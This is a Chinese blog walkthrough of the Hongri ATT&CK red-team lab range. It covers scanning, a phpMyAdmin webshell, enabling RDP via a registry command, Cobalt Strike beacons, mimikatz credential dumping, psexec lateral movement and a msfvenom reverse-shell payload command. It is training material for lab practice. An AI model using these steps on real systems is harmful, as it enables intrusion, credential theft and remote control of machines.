ATT&CK红队评估实战靶场(一)

最新推荐文章于 2024-06-21 02:25:46 发布
最新推荐文章于 2024-06-21 02:25:46 发布
阅读量4.7k 收藏 8
点赞数 2
分类专栏: # web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/113775696
版权

文章目录

前言

靶机下载地址:ATT&CK红队评估实战靶场
拓扑图:
在这里插入图片描述
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。

环境搭建

名字hostpasswd说明
windos7192.168.93.160/24 192.168.142.128/24hongrisec@2019web服务器
win2K2192.168.142.129/24hongrisec@2020域成员
windows server 2008 r2192.168.142.130/24hongrisec@2020域控制器
kali192.168.93.129/24kaliattack

在这里插入图片描述

测试网络连通性

windows7 ping win2k2 、 windows server 2012
在这里插入图片描述
这里win2k2互相ping
在这里插入图片描述
在这里插入图片描述
kali机与WEB联通
这里因为win7开了防火墙ping不通。

攻入内网

信息收集

探测同网段主机存活

nmap -sT 192.168.93.160
在这里插入图片描述

探测端口

nmap -sT 192.168.68.160
在这里插入图片描述

操作系统、版本

nmap –T4 –A
在这里插入图片描述

利用可用端口

经过前面的扫描发现80端口开启这里我们直接访问。
在这里插入图片描述
这里发现一个php探针,好家伙基本信息都在这里了,还要扫描信息收集吗?
但是看了一眼发现还是没有网站目录,这里直接用工具扫描,这里用的工具是dirsearch

./dirsearch.py -u 192.168.93.160 e*
在这里插入图片描述

漏洞一_信息泄露+弱口令

在这里插入图片描述

漏洞二_存储型XSS

在这里插入图片描述

在这里插入图片描述
需要后台审核,用来获取管理员cookie。

漏洞三_任意修改文件

在这里插入图片描述
在这里插入图片描述
蚂蚁剑直接连接

漏洞四_phpadmin文件写入

通过 phpmyadmin getshell参考链接
然后这里探针这里暴露了绝对路径。
在这里插入图片描述
然后直接根据上面那篇文章,getshell。

在这里插入图片描述

远程连接

这是在win7上进行的,根本没有打进win7的内网。利用蚁剑终端,查看开启端口,并给win7添加用户,之后要用3389远程连接桌面:
在这里插入图片描述
这里没有开启端口,我们直接百度一下。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

接下来创建用户,把用户加入管理员组获得权限。
在这里插入图片描述
先关一下防火墙
在这里插入图片描述
在这里插入图片描述

参考文章:内网渗透学习导航

域信息收集

一、什么是域

域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从Windows Server 2003开始 , Active Directory是负责维护该中央数据库的Windows组件。Windows域的概念与工作组的概念形成对比,在该工作组中,每台计算机都维护自己的安全主体数据库。

kali先启动cs
启动服务端
在这里插入图片描述
启动客户端
在这里插入图片描述
在Attacks->packags下的windows executable(s)选择监听,创建个木马
在这里插入图片描述
生成一个txt文件在主机powershell里运行
在这里插入图片描述
成功上线

判断是否存在域

使用 ipconfig /all 查看 DNS 服务器:

shell ipconfig /all

在这里插入图片描述
发现 DNS 服务器名为 god.org,查看域信息:net view

shell net view

在这里插入图片描述
查看主域信息:net view /domain

shell net view /domain

在这里插入图片描述
查询当前的登录域与用户信息:net config workstation
在这里插入图片描述
可以很清楚看出有无域。
使用 dump hash模块导出散列值,获取凭据 (access->dump hashs)
在这里插入图片描述
使用logonpasswords模块,调用内置在CS中的mimikatz将内存中的lsass.exe进程保存的用户明文密码和散列导出
在这里插入图片描述
在这里插入图片描述

横向移动

接下来就是横向移动,但是由于内网机是无法直接和外网连接的,这将win7当成跳板机。

官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
在这里插入图片描述
首先新建一个监听
在这里插入图片描述
然后使用之前获取的主机信息和凭据,使用psexec模块进行登入。
在这里插入图片描述
在这里插入图片描述
成功上线
在这里插入图片描述

MSF反弹shell

参考文章:链接
植入windows后门:

>payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

在这里插入图片描述
在msfconsole中进行配置
在这里插入图片描述
在这里插入图片描述
windows7执行
在这里插入图片描述
在这里插入图片描述

multi4
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[车联网安全自学篇] ATTACK安全之从ATT&CK看车联网安全如何落地企业SOC之基础知识篇
橙留香Park的博客
03-08 2453
2011年,洛马提出杀伤链(Kill Chain)将网络攻击过程模型化,定义了攻击者攻击要完成的七个阶段。但杀伤链的描述粒度仍然较粗、缺乏相应的细节也并未形成统一描述不便共享使用。2013年,MITRE在Kill Chain 的基础上,意图构建一套从攻击者视角出发、比Kill Chain粒度更细、有实际技术细节支撑的知识模型,在内部整合研发了ATT&CK 框架的雏形,后公开对外发布。
ATT&CK红队评估实战靶场(一) 练习
qq_31065143的博客
07-24 458
ATT&CK红队评估实战靶场(一) 练习 前言 已经一个月没有写东西啦,因为期末考试加上自己的项目还有考完还有学校的课程内容一直蛮忙的,一直到16号才放假,上个星期还去安恒实习了,就打算乘着双休搭建一个靶机,想学内网好久了,一直都没有上手操作,这边实际上操作一遍,但是下面的内容还是很蠢的也没有什么值得学习的操作,纯粹是我第一次上手进行内网学习的记录。 开始 首先使用nmap进行扫描,使用的命令如下: nmap -sP 192.168.1.0/24 对192.168.1.0网段进行扫描使用的参数说
ATT&CK红队评估实战靶场(一)
qq_53263789的博客
05-16 636
写在前面的话 第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩) 靶场地址:vulunstack 靶场搭建 Win7:密码: cys121` 外网192.168.47.132 内网 192.168.52.143 Win2008 密码:cys121` 内网 192.168.52.138 Win2003 密码:cys121` 内网 192.168.52.141 经过互相ping 内网三台机器可以互相ping通 Kali 外网 192.168.
简单讲解一下什么是ATT&CK框架
tangshuangsss的专栏
04-06 9543
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介ATT&CK框架由“MITRE”安全组织提出并列出了APT(高级可持续威胁攻击)的14个阶...
红日靶场-ATT&CK实战系列-红队评估(一)
最新发布
m0_66638011的博客
06-21 860
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
攻防演练学习之浅析ATT&CK和Cyber Kill Chain
m0_59598029的博客
08-18 621
以前也时不时会在freebuf上看文章,但是一直没发过。忽然发现freebuf可以自由投稿。先把以前在同名公众号(非典型产品经理笔记)上写的原创内容,挑一部分发一下。后续新内容会考虑同步在freebuf上发送。本系列当前共14篇。理解事物从描述开始。要理解一件事情,首先要能描述它,不可描述的事情,显然很难被解析、被应对,难以发展和演进。网络攻防因其抽象性,更是如此。下图为洛克希德·马丁公司官网(
蓝队----att&ck&IDS&蜜罐&威胁情报
qi_SJQ_的博客
02-27 971
hw中各种规则都能在各种hw资料里看到,不再熬yu 蓝队涉及到的技术涉及到应急、溯源、反制、情报、写报告、了解设备等综合性知识。 1.att&ck了解: 外国文档:https://attack.mitre.org/ 视频科普:https://www.zhihu.com/zvideo/1305977738013540352 2.蜜罐技术: 免费蜜罐 HFish:https://hfish.io/ github地址:https://github.com/hacklcx/HFish 部署、使用见官方文.
ATT&CK(对抗性战术,技术和公共知识库)
一智哇的博客
03-23 5707
ATT&CK
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1370
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
ATT&CK手册(修改版)
09-16
8. **企业应用**:企业可以利用ATT&CK框架评估自身安全态势,进行风险分析,并设计相应的防御措施。 9. **教育与培训**:对于网络安全专业人士,ATT&CK手册是宝贵的教育资源,可以帮助他们提高对攻击行为的理解,...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK为例构建网络安全知识图
dexi1113的博客
06-25 1000
随着攻击工具、方法的逐渐升级和复杂化,安全数据的大规模融合,攻防对抗愈加激烈。安全团队如何在浩瀚数据中有效发现高级威胁的蛛丝马迹,如何把网络安全专家的经验、知识有效转化为可复制可扩展的数据分析能力,如何将对抗高级威胁的“炼金术”逐步升级为科学淘金指南,如何将安全从业者从繁重的体力劳动中解放出来,愈发成为安全能力亟需突破的难点和重点,也是我们正在探索的方向。正如医疗行业中治疗疑难杂症依赖医疗专家,网络空间高级威胁的防护和处置也依赖安全专家的经验与知识。
云原生Att&ck矩阵
weixin_45540609的博客
08-10 1685
转载自:https://developer.aliyun.com/article/765449?groupCode=aliyunsecurity 一、云上容器ATT&CK攻防矩阵概览 ATTCK®框架(Reference ATTACK Matrix for Container on Cloud)是网络攻击中涉及的已知策略和技术的知识库。为便于企业构建容器化应用安全体系,阿里云在传统主机安全的基础上,围绕自建容器集群以及云原生容器服务场景,通过全面分析黑客攻击Docker和K8s的过程和手段,推
铭说 | 使用ATT&CK框架对威胁狩猎的成熟度进行评估
juminfo的博客
01-08 310
ATT&CK框架为威胁狩猎提供了一个统一的术语系统来描述攻击者在做什么,这样信息安全人员就可以在一个通用的语境下来工作以及交流如何处理它。MITRE使用ATT&CK框架来建议组织如何提高他们的检测能力,并使攻击者更难以隐藏。这个框架是开源的,并得到了威胁情报社区的广泛支持,具体内容可以访问MITRE的网站(attack.mitre.org)以获取更多的信息。 ATT&CK的最佳实践 MITRE的ATT&CK框架包含了如下几个方面的最佳实践: 检测和威胁狩猎 评估和工程 威胁
前沿安全论丨ATT&CK框架下,看攻击趋势的变化
山石网科的博客
07-23 630
企业在构建纵深防御体系之前,一个是可以看看ATT&CK攻击框架,从通用的攻击战术、技术、过程,通过透视攻击路径和方式方法,布局检测、防御的策略。另一方面,可以从目前的政策要求、标准来搭建体系化的防御体系。 运用 MITRE ATT&CK 中的攻击者行为通用分类,可以帮助网络事件响应团队 (CIRT)、安全运营中心 (SOC)、红蓝队、威胁猎手、IT 部门等安全团队,更好地测试、开发和排序其检测和响应机制,对公司的业务、行业和知识产权提供高效安全保障。 在栏目的第一篇文章,我们展现
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值